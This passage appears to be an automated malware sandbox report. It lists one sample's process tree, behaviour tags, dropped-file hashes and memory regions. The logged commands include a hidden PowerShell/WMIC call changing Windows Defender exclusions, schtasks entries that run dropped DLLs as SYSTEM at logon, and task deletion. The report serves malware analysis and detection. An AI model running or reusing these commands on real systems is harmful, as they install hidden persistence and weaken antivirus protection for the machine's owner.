C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bBBSFQQZU\VlltxK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LVynAQLCTpGcVPg" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LVynAQLCTpGcVPg2" /F /xml "C:\Program Files (x86)\bBBSFQQZU\YxLNKAB.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LVynAQLCTpGcVPg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LVynAQLCTpGcVPg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KatXkYONgJxXkD" /F /xml "C:\Program Files (x86)\rUfZlqUIdWiU2\CLbcZCn.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuJMQwokvjmjr2" /F /xml "C:\ProgramData\fHdtCMTPryqSDgVB\TGjMmAz.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jmhuFmncXBbhpBxSq2" /F /xml "C:\Program Files (x86)\rPikKiIbwrQGukIChiR\bVgZSWR.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OztlfTauKwYVOQQXHnj2" /F /xml "C:\Program Files (x86)\NNMAoTKMcAkAC\slByYNN.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRaTohzfdszDuijXP" /SC once /ST 02:10:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\QkRpUZnh\xtqpdoO.dll\",#1 /GSYjdidm 525403" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRaTohzfdszDuijXP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MhsnVFKWmmyXGZkTD"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 20442⤵
- Program crash
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\QkRpUZnh\xtqpdoO.dll",#1 /GSYjdidm 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\QkRpUZnh\xtqpdoO.dll",#1 /GSYjdidm 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRaTohzfdszDuijXP"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files (x86)\NNMAoTKMcAkAC\slByYNN.xmlFilesize
2KB
MD56bad4f9b2abc1ce9c122c022672c02f0
SHA1a83443ddbc0542b6a781615a9f5827aa64a3bc3b
SHA25682c2d9c3189533de9a7497f58bea2fe81b96bf3427d2b11f50ac722ce23fdf82
SHA51217f304eedae98bd03437776f312a68e846786b0faa48cd436065571cb9ac0bfec2cf0b1228be5f8958d794dd992d359a089c9604d72ba07447f3bea88ade3ff9
-
C:\Program Files (x86)\bBBSFQQZU\YxLNKAB.xmlFilesize
2KB
MD5bec04e192462df24ce0a82402569a29c
SHA12d198019148ae22567e549e4c252307dcf99dec9
SHA256ebf414abdc6f06b80ebfae603d446b67eab833297f1c6a91f71a687976e1b27e
SHA512c0d9148ccb3397ae3b87c3530e407fbd3985a64e4770e940191a8b137cf3c0cc11f94b1e4da01850b2801175ec4f8481c9fc3760638d1b0d22c909462d08df93
-
C:\Program Files (x86)\rPikKiIbwrQGukIChiR\bVgZSWR.xmlFilesize
2KB
MD5bbbd2410d86bbe0d64f7ac9277d5bbb1
SHA11070105f8c279cc404503af86c3fdf68dc689a2e
SHA25666f5d8789719306b3d35f1a463ed8d3ec7dc0203e17999e11b3df2a46f0ab65a
SHA51286c147de61f906a1dfe119b7c99ca4a35aef30965c2fa5c1d145d40768428ff8bde14db5640597a680a96864002c26311378760396ebfc52f069836b0a177f2f
-
C:\Program Files (x86)\rUfZlqUIdWiU2\CLbcZCn.xmlFilesize
2KB
MD575114e408862e05a19a6ee78f324e97b
SHA1ddb9103d964ff0995ed102f9c6cc07232fb2cb8b
SHA2562d94a6aadb5771a4b501baaec2474e0b6a2cd91333a09566a787824ab3ffba12
SHA512c86c65c8076a36dafa441f6eec697c02acdce1fd12833ada36b0e79b09b0abd367e80fa5c23b081e5735914b1f75bd69488d4ffddbf9c39acc6ab0ae9f3c359d
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD52603c87ce9b46915dccc79ee8e6c1551
SHA1263856538d3098b8ee1a842a58dca463b738e598
SHA2561b3ce090d219f4bc436e2e9ff1688c835895fe42f1ad11ec2bca51960a8aee38
SHA51233b65d80642f0ea62d39010d018ee024cf39dee5b73be4017f194498f5084993a3e57d48ed80b6819aec4a28f9b57f0a28d905d0f224f6d9dfeba092f75473fa
-
C:\ProgramData\fHdtCMTPryqSDgVB\TGjMmAz.xmlFilesize
2KB
MD50cc1e6cb9813c974a5390a3283cf287e
SHA1dfe3e97edee4b3489a55c24c36baa3d36985a03e
SHA25649749215ceab6357ebbe091845bd19cc1a4569a3bddd101c0fe75f7cb6276ebc
SHA5120e9a2d53a92e5f30bb74655559c0701e94a36ce99781ddf6707840316c53a1db838ddc304ed201388bcfd2c470f83476b1640542ad8c27072a964426aefa04c2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5a9c6a3a6cc82a9a9bb441b3e7136f88b
SHA188a16ca861c28198b1ee71a96719c3ac56e0abe7
SHA256ef14d09bf8cf0a7645ec1157665425123750de15fc44a9ba78ae0e625a2b9c32
SHA51272dcf402e311e8bc6e1d96072c3d32bc3cf646fcd8eeb8a6d3f64b355edba3aced47f0009289a1eaa4121ab31fd593433b0058d4cf04fedd620408c6b855cafd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD574628ec63f2b3751360203bc3e249323
SHA163b25eb34e5b8aca453b53caeee2ce0c35815057
SHA256993fc8793c25cd5a2405620915a8fe5a8813e9dbab56e9c9778bd3026487b730
SHA5121670c0154ed921f39260d1f176044f7f6fc59e630636d53b2dc85b433e98c03feb75720989091af8e90c3ced3f4ccd2b6ae16a995517e5dbb46b8ad05567688c
-
C:\Users\Admin\AppData\Local\Temp\7zS61D7.tmp\Install.exeFilesize
6.4MB
MD5fa6c8a4dcc2b50d9ecce866e6bf6bf82
SHA104f4665baccd0ada23349e69b93a1ebad7571a80
SHA25613fec9b387fb25d13e8247a2efc8c45b044726d1aa24b692aac2a925b972fdff
SHA5127d452b09893f8c2cb88fa22b89c55fb07b85ef65dc22bed96be74443c2f32df1dc502a789d7f11a118c49f7044a5b273e5bd4a2d3e8d1ccd6623b6a3c43dd2e8
-
C:\Users\Admin\AppData\Local\Temp\7zS638C.tmp\Install.exeFilesize
6.6MB
MD5c459c807bebcbb6553ff3388b249a9fd
SHA16e428b6c77c966e33c5c0e321d722b57bd3bf975
SHA2569c3372c448ccebbe7b771c24c207a0ae0e145a25d0e96f5ffb0559ff5571154b
SHA5127641130d16107aa5bdf16f39a6f9e6404230376bae4a9489b0b9462218075c4a0cea35cff3b434c6a352f05f49aca4a3f71839acf16cbe278ac49235ca6291cf
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4axcvy2p.iop.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs.jsFilesize
6KB
MD5c3de4d34cd84d2204b71f17b2b0f1fff
SHA1c2bdcf2045fa5d7e30c858990e81e321ad0033f0
SHA2566a2dc97282979fee4f091d3d3927e84cf6b91bf5de10bca4bae5437da8793d5b
SHA512fe4de526fc9ff4dc200696d010e8b291356f8be010db4dc7b711fdc191002d94f8328038420d488ae99bb8a526f2a78263db20ee841c618824c5c836e3c108c9
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5e33ed3d4cc9b2e5a08ae25747ef47620
SHA1e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
SHA2560e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
SHA5129e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD5d5bcb077b0ba6302e6383ea08d1c89b5
SHA1a7e0f6df140df245f1616b54df8ebf241f55b337
SHA25681dff4187bc88d8e181a3bd3f81b345bb9da64c36d081d591ffeabfb0a88e0cd
SHA5126eec000f14f225b4d4034b430868003b6d26cd623f97e0f8f076add22fe4608b6de1a5c7b33eab8094b7bb714c3688c8fc750b6fd6e530cf66c725a308607092
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD58e1d5ffe85ca1fbed8b6e03ba6979a6b
SHA11991efd0ee4d1ace9b479a5e72c69f0369122aae
SHA2568d6109977b6054e77dd4358bd0b8df8d7ca773a6ae591d0d1a1d2076093663d9
SHA512b24120ceee513868f6f00338d61ff995fab935a2e9b321cb04ca300c710e86383759a1cc3dc5fca99c7afee07f8472642f2f9210c76de1c9ece225cbd644355d
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\QkRpUZnh\xtqpdoO.dllFilesize
6.5MB
MD52c5315f48e9b097d2c447e016743854f
SHA184006269f2b54df8bef71d46364bd82946b24759
SHA256233a6dfcb0ea347aed469bac784313ce0fb0dbc2ce84b5f3b3561d4741b03dc2
SHA512efd65e08582051bf7ef3795f7d0718aab625ea1500eaae19b0a665807b697e81a0e1dd580885765f364ab3e763ed913a19cbbe27327bc45ce0c1a0aeb65ce4ec
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5fa4ab2b7c89c5943f88f8ae0b12f3d42
SHA1dd383010ae707003f995855b1995865672879c7c
SHA2566cc8c13a3692843414fbf6563cf5873685dd77f7e9a1988c0388a45d8e45f47a
SHA512d57ee1376efc7173e5e3db30e8879bda4a82c51d2098d007d7ab4b1ccd767a051ff4587598a96d50a9bd2271de41a074c2dc1a72eb729cee905d35ec8877fbaf
-
memory/1132-409-0x00000000037B0000-0x000000000737B000-memory.dmpFilesize
59.8MB
-
memory/1828-195-0x0000000003410000-0x0000000003470000-memory.dmpFilesize
384KB
-
memory/1828-388-0x0000000003E60000-0x0000000003F32000-memory.dmpFilesize
840KB
-
memory/1828-408-0x0000000001150000-0x00000000017F5000-memory.dmpFilesize
6.6MB
-
memory/1828-378-0x0000000003C70000-0x0000000003CF8000-memory.dmpFilesize
544KB
-
memory/1828-123-0x0000000001150000-0x00000000017F5000-memory.dmpFilesize
6.6MB
-
memory/1828-126-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/1828-138-0x0000000002C00000-0x0000000002C85000-memory.dmpFilesize
532KB
-
memory/1916-115-0x0000000000F80000-0x0000000001625000-memory.dmpFilesize
6.6MB
-
memory/1916-47-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/1916-45-0x0000000000F80000-0x0000000001625000-memory.dmpFilesize
6.6MB
-
memory/2376-53-0x0000000007550000-0x000000000759B000-memory.dmpFilesize
300KB
-
memory/2376-52-0x0000000007010000-0x0000000007360000-memory.dmpFilesize
3.3MB
-
memory/2688-17-0x0000000013BC0000-0x0000000013BC1000-memory.dmpFilesize
4KB
-
memory/2688-43-0x0000000000F80000-0x0000000001625000-memory.dmpFilesize
6.6MB
-
memory/2688-12-0x0000000000F80000-0x0000000001625000-memory.dmpFilesize
6.6MB
-
memory/2688-13-0x0000000010000000-0x0000000013BCB000-memory.dmpFilesize
59.8MB
-
memory/3132-154-0x0000000007610000-0x000000000765B000-memory.dmpFilesize
300KB
-
memory/3132-148-0x0000000007150000-0x00000000074A0000-memory.dmpFilesize
3.3MB
-
memory/4456-93-0x000001F9B22C0000-0x000001F9B2336000-memory.dmpFilesize
472KB
-
memory/4456-89-0x000001F999FD0000-0x000001F999FF2000-memory.dmpFilesize
136KB
-
memory/4592-27-0x0000000007F40000-0x0000000007F8B000-memory.dmpFilesize
300KB
-
memory/4592-23-0x0000000007350000-0x00000000073B6000-memory.dmpFilesize
408KB
-
memory/4592-24-0x00000000074A0000-0x0000000007506000-memory.dmpFilesize
408KB
-
memory/4592-22-0x0000000006C70000-0x0000000006C92000-memory.dmpFilesize
136KB
-
memory/4592-21-0x0000000006D20000-0x0000000007348000-memory.dmpFilesize
6.2MB
-
memory/4592-20-0x0000000001140000-0x0000000001176000-memory.dmpFilesize
216KB
-
memory/4592-25-0x0000000007610000-0x0000000007960000-memory.dmpFilesize
3.3MB
-
memory/4592-26-0x0000000007480000-0x000000000749C000-memory.dmpFilesize
112KB
-
memory/4592-28-0x0000000007C80000-0x0000000007CF6000-memory.dmpFilesize
472KB